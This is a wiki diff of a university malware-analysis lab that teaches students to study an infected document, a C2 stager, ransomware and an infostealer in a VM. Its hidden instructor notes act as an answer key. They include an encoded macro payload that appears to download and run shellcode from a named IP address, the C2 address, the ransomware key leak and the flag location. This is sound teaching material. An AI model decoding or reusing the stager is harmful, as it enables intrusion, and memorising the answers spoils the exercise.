Differences
This shows you the differences between two versions of the page.
|
isc:labs:06 [2024/11/10 12:42] vlad_iulius.nastase |
isc:labs:06 [2024/11/11 14:43] (current) vlad_iulius.nastase |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Lab 06 - Malware ====== | ====== Lab 06 - Malware ====== | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <note warning> | ||
| + | **Ghid Command and Control** | ||
| + | |||
| + | [[https://docs.google.com/document/d/1sPfDPA6IvklVLTsZMk6FHv_vrWzu94E3qw-B3eWwSnw/edit?usp=sharing]] | ||
| + | |||
| + | [[https://outline.vladn.st/s/fcb3a6a5-da87-40a7-872a-39ad4a9aff43]] | ||
| + | |||
| + | </note> | ||
| + | </ifauth> | ||
| ===== Setup ===== | ===== Setup ===== | ||
| - | For this lab we will use the provided Windows VM. Please [[https://repository.grid.pub.ro/cs/isc/ISC%20Malware%20Lab%20VM.zip|download it from here]] in advance (~12GB). | + | For this lab we will use the provided Windows VM. Please [[https://repository.grid.pub.ro/cs/isc/ISC%20Malware%20Lab%20VM.zip|download it from here]] in advance (~12GB archived; **you will need ~30-40GB of free storage on your computer**). |
| The VM is compatible with VMWare (Workstation and Player) >16. You can [[https://softwareupdate.vmware.com/cds/vmw-desktop/|download VMWare here]]. We recommend Workstation 17. | The VM is compatible with VMWare (Workstation and Player) >16. You can [[https://softwareupdate.vmware.com/cds/vmw-desktop/|download VMWare here]]. We recommend Workstation 17. | ||
| Line 14: | Line 25: | ||
| Every tool you need is already installed on the VM we provided. If it’s not on the taskbar, you can find it on your Desktop, in the folder named ''%%Tools%%''. | Every tool you need is already installed on the VM we provided. If it’s not on the taskbar, you can find it on your Desktop, in the folder named ''%%Tools%%''. | ||
| </note> | </note> | ||
| + | |||
| + | If needed, we will also use [[https://cloud.grid.pub.ro/|Openstack]] (limited capacity). Use the ''%%isc_prj%%'' project and start a VM with the following specifications: | ||
| + | * Source: ''%%ISC Malware Lab%%'' | ||
| + | * Flavor: ''%%m1.isc_malware_lab%%'' | ||
| + | You don't need to specify an SSH key, we will be using the browser console to interact with the virtual machine. | ||
| ===== 00. Infection vector ===== | ===== 00. Infection vector ===== | ||
| Line 96: | Line 112: | ||
| * the flag for this exercise | * the flag for this exercise | ||
| * the address for the attacker’s infrastructure (which you also observed in the sandbox results) | * the address for the attacker’s infrastructure (which you also observed in the sandbox results) | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | <code> | ||
| + | olevba 'IMPORTANT FIANNCIAL DATA.xls' | ||
| + | </code> | ||
| + | |||
| + | [[https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5B%22_%26%20%5C%5Cr%5C%5Cn%5D'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=SkFCWEFHa0FiZ0F6QURJQUlBQTlBQ0FBUUFBaUFBMEFDZ0IxQUhNQWFRQnVBR2NBSUFCVEFIa0Fjd0IwQUdVQWJRQTdBQTBBQ2dCMUFITUFhUUJ1QUdjQUlBQlRBSGtBY3dCMEFHVUFiUUF1QUZJQWRRQnVBSFFBYVFCdEFHVUFMZ0JKQUc0QWRBQmxBSElBYndCd0FGTUFaUUJ5QUhZQWFRQmpBR1VBY3dBN0FBMEFDZ0J3QUhVQVlnQnNBR2tBWXdBZ0FHTUFiQUJoQUhNQWN3QWdBRmNBYVFCdUFETUFNZ0FnQUhzQURRQUtBRnNBUkFCc0FHd0FTUSIgXw0KICAgICYgIkJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDa0FYUUFOQUFvQWNBQjFBR0lBYkFCcEFHTUFJQUJ6QUhRQVlRQjBBR2tBWXdBZ0FHVUFlQUIwQUdVQWNnQnVBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQldBR2tBY2dCMEFIVUFZUUJzQUVFQWJBQnNBRzhBWXdBb0FFa0FiZ0IwQUZBQWRBQnlBQ0FBYkFCd0FFRUFaQUJrQUhJQVpRQnpBSE1BTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaQUIzQUZNQWFRQjYiIF8NCiAgICAmICJBR1VBTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaZ0JzQUVFQWJBQnNBRzhBWXdCaEFIUUFhUUJ2QUc0QVZBQjVBSEFBWlFBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJtQUd3QVVBQnlBRzhBZEFCbEFHTUFkQUFwQURzQURRQUtBRnNBUkFCc0FHd0FTUUJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDd0FJQUJEQUdnQVlRQnlBRk1BWlFCMEFEMEFRd0JvQUdFQWNnQlRBR1VBZEFBdUFFIiBfDQogICAgJiAiRUFiZ0J6QUdrQUtRQmRBQTBBQ2dCd0FIVUFZZ0JzQUdrQVl3QWdBSE1BZEFCaEFIUUFhUUJqQUNBQVpRQjRBSFFBWlFCeUFHNEFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FFTUFjZ0JsQUdFQWRBQmxBRlFBYUFCeUFHVUFZUUJrQUNnQURRQUtBQ0FBSUFBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBUVFCMEFIUUFjZ0JwQUdJQWRRQjBBR1VBY3dBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJrQUhjQSIgXw0KICAgICYgIlV3QjBBR0VBWXdCckFGTUFhUUI2QUdVQUxBQU5BQW9BSUFBZ0FDQUFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FHd0FjQUJUQUhRQVlRQnlBSFFBUVFCa0FHUUFjZ0JsQUhNQWN3QXNBQTBBQ2dBZ0FDQUFJQUFnQUVrQWJnQjBBRkFBZEFCeUFDQUFiQUJ3QUZBQVlRQnlBR0VBYlFCbEFIUUFaUUJ5QUN3QURRQUtBQ0FBSUFBZ0FDQUFkUUJwQUc0QWRBQWdBR1FBZHdCREFISUFaUUJoQUhRQWFRQnZBRzRBUmdCc0FHRUFad0J6QUN3QURRQUtBQ0FBSUEiIF8NCiAgICAmICJBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBU1FCa0FDa0FPd0FOQUFvQVd3QkVBR3dBYkFCSkFHMEFjQUJ2QUhJQWRBQW9BQ0lBYXdCbEFISUFiZ0JsQUd3QU13QXlBQzRBWkFCc0FHd0FJZ0FzQUNBQVV3QmxBSFFBVEFCaEFITUFkQUJGQUhJQWNnQnZBSElBUFFCMEFISUFkUUJsQUNrQVhRQU5BQW9BY0FCMUFHSUFiQUJwQUdNQUlBQnpBSFFBWVFCMEFHa0FZd0FnQUdVQWVBQjBBR1VBY2dCdUFDQUFWUUJKIiBfDQogICAgJiAiQUc0QWRBQXpBRElBSUFCWEFHRUFhUUIwQUVZQWJ3QnlBRk1BYVFCdUFHY0FiQUJsQUU4QVlnQnFBR1VBWXdCMEFDZ0FEUUFLQUNBQUlBQWdBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQm9BRWdBWVFCdUFHUUFiQUJsQUN3QURRQUtBQ0FBSUFBZ0FDQUFWUUJKQUc0QWRBQXpBRElBSUFCa0FIY0FUUUJwQUd3QWJBQnBBSE1BWlFCakFHOEFiZ0JrQUhNQUtRQTdBQTBBQ2dCOUFBMEFDZ0FpQUVBQURRQUtBRUVBWkFCa0FDMEFWQUI1QUhBQVpRQWdBQyIgXw0KICAgICYgIlFBVndCcEFHNEFNd0F5QUEwQUNnQU5BQW9BSXdBZ0FFa0FVd0JEQUhzQWFBQmxBR01BWVFCeUFHMEFaUUJ1QUY4QWR3QmhBSE1BWHdCb0FHVUFjZ0JsQUgwQURRQUtBRnNBVXdCNUFITUFkQUJsQUcwQUxnQk9BR1VBZEFBdUFGTUFaUUJ5QUhZQWFRQmpBR1VBVUFCdkFHa0FiZ0IwQUUwQVlRQnVBR0VBWndCbEFISUFYUUE2QURvQVV3QmxBSElBZGdCbEFISUFRd0JsQUhJQWRBQnBBR1lBYVFCakFHRUFkQUJsQUZZQVlRQnNBR2tBWkFCaEFIUUEiIF8NCiAgICAmICJhUUJ2QUc0QVF3QmhBR3dBYkFCaUFHRUFZd0JyQUNBQVBRQWdBSHNBSkFCMEFISUFkUUJsQUgwQUlBQTdBQTBBQ2dBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbEFDQUFQUUFnQUNnQVRnQmxBSGNBTFFCUEFHSUFhZ0JsQUdNQWRBQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVRnQmxBSFFBTGdCWEFHVUFZZ0JEQUV3QWFRQmxBRzRBZEFBcEFDNEFSQUJ2QUhjQWJnQnNBRzhBWVFCa0FFUUFZUUIwQUdFQUtBQWlBR2dBZEFCMEFIQUFjd0E2QUM4QUx3IiBfDQogICAgJiAiQXhBRGtBTkFBdUFERUFPQUF5QUM0QU1RQTJBRFFBTGdBeEFEUUFPUUE2QURnQU1BQTRBREFBTHdCbUFHOEFiZ0IwQUdFQWR3QmxBSE1BYndCdEFHVUFMZ0IzQUc4QVpnQm1BQ0lBS1FBTkFBb0FhUUJtQUNBQUtBQWtBSE1BYUFCbEFHd0FiQUJqQUc4QVpBQmxBQ0FBTFFCbEFIRUFJQUFrQUc0QWRRQnNBR3dBS1FBZ0FIc0FSUUI0QUdrQWRBQjlBRHNBRFFBS0FDUUFjd0JwQUhvQVpRQWdBRDBBSUFBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbCIgXw0KICAgICYgIkFDNEFUQUJsQUc0QVp3QjBBR2dBRFFBS0FBMEFDZ0JiQUVrQWJnQjBBRkFBZEFCeUFGMEFKQUJoQUdRQVpBQnlBQ0FBUFFBZ0FGc0FWd0JwQUc0QU13QXlBRjBBT2dBNkFGWUFhUUJ5QUhRQWRRQmhBR3dBUVFCc0FHd0Fid0JqQUNnQU1BQXNBQ1FBY3dCcEFIb0FaUUFzQURBQWVBQXhBREFBTUFBd0FDd0FNQUI0QURRQU1BQXBBRHNBRFFBS0FGc0FVd0I1QUhNQWRBQmxBRzBBTGdCU0FIVUFiZ0IwQUdrQWJRQmxBQzRBU1FCdUFIUUFaUUJ5QUciIF8NCiAgICAmICI4QWNBQlRBR1VBY2dCMkFHa0FZd0JsQUhNQUxnQk5BR0VBY2dCekFHZ0FZUUJzQUYwQU9nQTZBRU1BYndCd0FIa0FLQUFrQUhNQWFBQmxBR3dBYkFCakFHOEFaQUJsQUN3QUlBQXdBQ3dBSUFBa0FHRUFaQUJrQUhJQUxBQWdBQ1FBY3dCcEFIb0FaUUFwQUEwQUNnQWtBSFFBYUFCaEFHNEFaQUJzQUdVQVBRQmJBRmNBYVFCdUFETUFNZ0JkQURvQU9nQkRBSElBWlFCaEFIUUFaUUJVQUdnQWNnQmxBR0VBWkFBb0FEQUFMQUF3QUN3QUpBQmhBR1FBIiBfDQogICAgJiAiWkFCeUFDd0FNQUFzQURBQUxBQXdBQ2tBT3dBTkFBb0FXd0JYQUdrQWJnQXpBRElBWFFBNkFEb0FWd0JoQUdrQWRBQkdBRzhBY2dCVEFHa0FiZ0JuQUd3QVpRQlBBR0lBYWdCbEFHTUFkQUFvQUNRQWRBQm9BR0VBYmdCa0FHd0FaUUFzQUNBQVd3QjFBR2tBYmdCMEFETUFNZ0JkQUNJQU1BQjRBRVlBUmdCR0FFWUFSZ0JHQUVZQVJnQWlBQ2tBIg&ieol=CRLF&oeol=CRLF|CyberChef recipe]] | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| ===== 02. Command and Control (C2 / C&C) ===== | ===== 02. Command and Control (C2 / C&C) ===== | ||
| Line 115: | Line 141: | ||
| The C2 stager we used is a pretty simple one. If you want to read more about C2 capabilities you can read this [[https://dominicbreuker.com/post/learning_sliver_c2_01_installation/|awesome blog post series]] about Sliver. | The C2 stager we used is a pretty simple one. If you want to read more about C2 capabilities you can read this [[https://dominicbreuker.com/post/learning_sliver_c2_01_installation/|awesome blog post series]] about Sliver. | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | [[http://194.182.164.149/]] | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| ===== 03. Ransomware ===== | ===== 03. Ransomware ===== | ||
| Line 127: | Line 159: | ||
| - | Ransomware is a type of malware that encrypts documents and files on your computer, demanding a ransom to obtain a decryption key or program. In our case, the entire content of the ''%%very_important_documents%%'' folder on your Desktop has been encrypted. | + | Ransomware is a type of malware that encrypts documents and files on your computer, demanding a ransom to obtain a decryption key or program. In our case, the entire content of the ''%%very_secret_documents%%'' folder on your Desktop has been encrypted. |
| But is there any way you can recover those files? Since we presume the attacker has a decryption key for your files, that means the ransomware must communicate in some way. Try and use Wireshark to see if any traffic seems out of the ordinary. | But is there any way you can recover those files? Since we presume the attacker has a decryption key for your files, that means the ransomware must communicate in some way. Try and use Wireshark to see if any traffic seems out of the ordinary. | ||
| Line 147: | Line 179: | ||
| You can also use any of the sandboxes you used at the first exercise and see what useful information they can provide. | You can also use any of the sandboxes you used at the first exercise and see what useful information they can provide. | ||
| </note> | </note> | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | Cheia e trimisa ca DNS request (hex-encoded). | ||
| + | |||
| + | <code> | ||
| + | .\decryptor.exe $hex_key .\very_important_documents | ||
| + | </code> | ||
| + | |||
| + | Flag-ul din documente e sub trollface-ul din documentul ''%%subiecte examen ISC.docx%%'' | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| ===== 04. Infostealers ===== | ===== 04. Infostealers ===== | ||
| Line 169: | Line 213: | ||
| Use ''%%procmon64%%'' to look for accessed files and network activity. By default ''%%procmon64%%'' shows what all current processes are doing. Try and filter for our process (look at what options ''%%procmon64%%'' offers you at the top of the window). | Use ''%%procmon64%%'' to look for accessed files and network activity. By default ''%%procmon64%%'' shows what all current processes are doing. Try and filter for our process (look at what options ''%%procmon64%%'' offers you at the top of the window). | ||
| + | |||
| + | <note tip> | ||
| + | **You need to run the binary again after setting up your filters!** | ||
| + | </note> | ||
| Also try to have a look at the files that are managed by Chrome and check out the links at the end of the lab if you want to better understand how he passwords are stored. You also have a tool to explore SQLite databases installed already. | Also try to have a look at the files that are managed by Chrome and check out the links at the end of the lab if you want to better understand how he passwords are stored. You also have a tool to explore SQLite databases installed already. | ||
| Line 180: | Line 228: | ||
| Make use of the sandboxes, maybe they also provide some useful information. See how it compares to what you find by manually analyzing the binary. | Make use of the sandboxes, maybe they also provide some useful information. See how it compares to what you find by manually analyzing the binary. | ||
| </note> | </note> | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | Arhiva cu cookie-urile si parolele de la Chrome e trimisa ca POST request. (Wireshark > File > Export objects > HTTP) | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| ===== 05. [Bonus] Anti-reversing techniques ===== | ===== 05. [Bonus] Anti-reversing techniques ===== | ||
